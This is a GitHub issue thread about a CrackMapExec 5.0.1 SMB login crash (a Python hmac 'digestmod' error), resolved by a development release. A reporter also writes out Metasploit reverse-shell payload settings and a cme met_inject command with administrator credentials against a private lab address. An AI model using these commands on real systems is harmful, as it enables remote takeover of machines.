### ISSUE TITLE
cme 5.0.1 impacket modules fails

### ISSUE THREAD

**Issue by n0bl1nk** [byt3bl33d3r/CrackMapExec#355] opened 2020-04-29 00:52 UTC
DESCRIPTION:
cme 5.0.1 impacket modules errors. 

COMMAND:
crackmapexec smb 192.168.211.10 -u admin -p 'admin' 

OUTPUT:

```
g:True) (SMBv1:False)
Traceback (most recent call last):
  File "src/gevent/greenlet.py", line 766, in gevent._greenlet.Greenlet.run
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 110, in __init__
    connection.__init__(self, args, db, host)
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 42, in __init__
    self.proto_flow()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 74, in proto_flow
    self.login()
  File "/usr/lib/python3/dist-packages/cme/connection.py", line 215, in login
    if self.plaintext_login(self.domain, user, password): return True
  File "/usr/lib/python3/dist-packages/cme/protocols/smb.py", line 250, in plaintext_login
    self.conn.login(username, password, domain)
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 267, in login
    return self._SMBConnection.login(user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 778, in login
    type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 631, in getNTLMSSPType3
    ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'],
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 39, in computeResponse
    return computeResponseNTLMv2(flags, serverChallenge, clientChallenge, serverName, domain, user, password,
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 902, in computeResponseNTLMv2
    responseKeyNT = NTOWFv2(user, password, domain, nthash)
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 891, in NTOWFv2
    return hmac_md5(theHash, user.upper().encode('utf-16le') + domain.encode('utf-16le'))
  File "/usr/lib/python3/dist-packages/impacket/ntlm.py", line 882, in hmac_md5
    h = hmac.new(key)
  File "/usr/lib/python3.8/hmac.py", line 153, in new
    return HMAC(key, msg, digestmod)
  File "/usr/lib/python3.8/hmac.py", line 51, in __init__
    raise TypeError("Missing required parameter 'digestmod'.")
TypeError: Missing required parameter 'digestmod'.
2020-04-29T00:44:05Z <Greenlet at 0x7f1511cbb370: smb(Namespace(clear_obfscripts=False, content=False, c, <protocol.database object at 0x7f1511d0b1f0>, '192.168.211.10')> failed with TypeError
```

**Comment by blshkv** [comment] 2020-04-29 01:48
can't confirm it:
```
bash$ python-test-env/bin/crackmapexec smb 10.0.0.110 -u admin -p 'admin'
SMB         10.0.0.110      445    LAPTOP-HRJ9REOB  [*] Windows 10.0 Build 18362 x64 (name:LAPTOP-HRJ9REOB) (domain:LAPTOP-HRJ9REOB) (signing:False) (SMBv1:False)
SMB         10.0.0.110      445    LAPTOP-HRJ9REOB  [-] LAPTOP-HRJ9REOB\admin:admin STATUS_LOGON_FAILURE 
(python-test-env)
```

**Comment by n0bl1nk** [comment] 2020-04-29 03:24
![issu22](https://user-images.githubusercontent.com/61601874/80558165-05bb5a00-89e2-11ea-91bc-bf1a72e861b6.png)

**Comment by n0bl1nk** [comment] 2020-04-29 03:37
I was using 4.0.1 version, but I installed 5.0.1 version because I can't get reverse shell with "met_inject" and "empire_exec" in 4.0.1 version.
 
 **Authentication is successful in 4.0.1 version**
![issu33](https://user-images.githubusercontent.com/61601874/80558646-cd1c8000-89e3-11ea-81d2-10aa4ff11e97.png)

**Comment by blshkv** [comment] 2020-04-29 03:39
Try to  test it in Pentoo ;-) Just joking. I have tested with valid credentials, still can't confirm it.
Please install it in a virtualenv and  test in a "clean" env

**Comment by n0bl1nk** [comment] 2020-04-29 03:49
Do you have any idea why I can't get reverse shell in 4.0.1 version? 
I succeed using psexec on metasploit.

```
set payload windows/meterpreter/reverse_https
set LHOST 192.168.211.136
set LPORT 4444
```

`cme smb 192.168.211.10 -u Administrator -p 'Password' -M met_inject -o LHOST=192.168.211.136 LPORT=4444`

![issu55](https://user-images.githubusercontent.com/61601874/80559147-4f597400-89e5-11ea-9ac8-bbc519c9194f.png)

but i can't get a session

if i set windows/meterpeter/reverse_tcp triggers but session dies.

**Comment by blshkv** [comment] 2020-04-29 03:51
4.0.1 was  never officially released, so I  have not idea where it came from. Anyway, it were a lot of changes recently, so you should really use the latest.

**Comment by n0bl1nk** [comment] 2020-04-29 03:52
Okey thank you :)

**Comment by samuelkneppel** [comment] 2020-04-29 05:24
FWIW, I am also receiving the same error on the same version on my Kali install. I also tried using a venv and received the same error within.

**Comment by mpgn** [comment] 2020-04-29 08:59
Unfortunately I cannot reproduce this. Please include more details, did you compile the binary yourself ? did you take it from the release version ?

**Comment by n0bl1nk** [comment] 2020-04-29 17:18
setup:
apt-get install crackmapexec

error when I run the command:
![issu77](https://user-images.githubusercontent.com/61601874/80625630-28875600-8a56-11ea-9216-7e8ea580aac3.png)

kali version:
![issu66](https://user-images.githubusercontent.com/61601874/80625681-405eda00-8a56-11ea-825b-7c6ba727c194.png)

**Comment by mpgn** [comment] 2020-04-29 18:24
Thanks @n0bl1nk can you test using this release ?

https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev

**Comment by n0bl1nk** [comment] 2020-04-29 18:49
I am installing a new Kali, I will re-install and report on it.

**Comment by Cryo2** [comment] 2020-04-29 18:53
Hello, same issue with the latest kali release.

I have this error message only for (Pwn3d!) user.

I will try with the new release.

**Comment by mpgn** [comment] 2020-04-29 19:05
Ok, please use the latest version, not the one from apt, we cannot change code on the api version ;)

**Comment by Cryo2** [comment] 2020-04-29 19:10
Working, thank you :)

**Comment by mpgn** [comment] 2020-04-29 19:34
Waiting for @Cryo2 and closing if working

**Comment by n0bl1nk** [comment] 2020-04-29 20:36
https://github.com/byt3bl33d3r/CrackMapExec/releases/tag/v5.0.1dev is working 

But still can't get a reverse-shell met_inject and empire_exec 

met_inject
![issu88](https://user-images.githubusercontent.com/61601874/80643375-a6f0f180-8a70-11ea-80fd-6a3c1c141924.png)

empire_exec
![issu99](https://user-images.githubusercontent.com/61601874/80643388-ad7f6900-8a70-11ea-88ce-8f297fa75275.png)

**after running commands**
**metasploit listener:**
![issu101](https://user-images.githubusercontent.com/61601874/80643797-5af27c80-8a71-11ea-974e-e6371d5e1ea5.png)

**empire listener:**
![issu202](https://user-images.githubusercontent.com/61601874/80643836-680f6b80-8a71-11ea-8d83-a8cc38f29f27.png)

target system windows 2012 r2
I can successfully log in with metasploit psexec

**cme can successfully do these and similar commands**

![issu303](https://user-images.githubusercontent.com/61601874/80644283-11566180-8a72-11ea-9ac1-faeaebc25928.png)

![issu404](https://user-images.githubusercontent.com/61601874/80644298-17e4d900-8a72-11ea-8b0d-5577347d393f.png)

**Comment by mpgn** [comment] 2020-04-29 20:57
I reference this problem as a new issue:

https://github.com/byt3bl33d3r/CrackMapExec/issues/357

**Closed** 2020-04-29 20:57 UTC
Labels: moar info required comrade
